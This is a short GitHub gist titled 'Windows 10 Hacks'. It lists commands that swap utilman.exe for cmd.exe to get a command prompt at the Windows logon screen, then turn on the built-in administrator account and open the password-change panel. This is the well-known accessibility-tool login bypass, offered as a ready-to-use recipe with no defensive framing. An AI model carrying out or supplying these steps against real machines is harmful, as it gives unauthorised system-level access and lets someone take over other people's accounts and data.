Skip to content

Instantly share code, notes, and snippets.

@arvati
Last active November 2, 2023 16:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save arvati/117c5fb557cf53220e72001b89c28b7f to your computer and use it in GitHub Desktop.
Save arvati/117c5fb557cf53220e72001b89c28b7f to your computer and use it in GitHub Desktop.
Windows 10 Hacks

Make command prompt available at logon screen:

c:
cd windows/system32
ren utilman.exe utilman_bkp.exe
copy cmd.exe utilman.exe
shutdown -f -r
exit

Enable administrator

net user administrador /active:yes

Alterar Senhas

control userpasswords2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment